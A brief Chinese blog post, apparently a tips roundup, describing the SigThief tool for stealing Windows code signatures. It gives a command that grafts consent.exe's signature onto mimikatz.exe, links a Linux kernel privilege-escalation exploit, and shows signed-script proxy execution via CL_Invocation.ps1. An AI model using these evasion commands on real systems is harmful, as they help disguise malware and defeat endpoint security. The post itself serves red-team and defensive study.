Sigthief

Sigthief是一个由python编写的，可以用于劫持合法的数字签名并绕过Windows的哈希验证机制的脚本工具。也可被红队用于将恶意二进制文件以及PowerShell脚本与本机操作系统文件相混淆，以逃避检测并绕过设备的安全防护。

下载

Github:：https://github.com/secretsquirrel/SigThief

使用

1. Sigthief的使用方法也非常简单，命令如下：

python sigthief.py -i c:\Windows\System32\consent.exe -t mimikatz.exe -o mimi.exe

视频演示：

2. Linux内核<4.4.0-83/<4.8.0-58（Ubuntu 14.04 / 16.04） – 提权漏洞。

EXP：https://0day.today/exploit/29351

视频演示：

3.?CL_Invocation调用

Get-AuthenticodeSignature C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 SyncInvoke calc.exe

视频演示：

转载请注明：即刻安全 » <干货 · 杂铺店>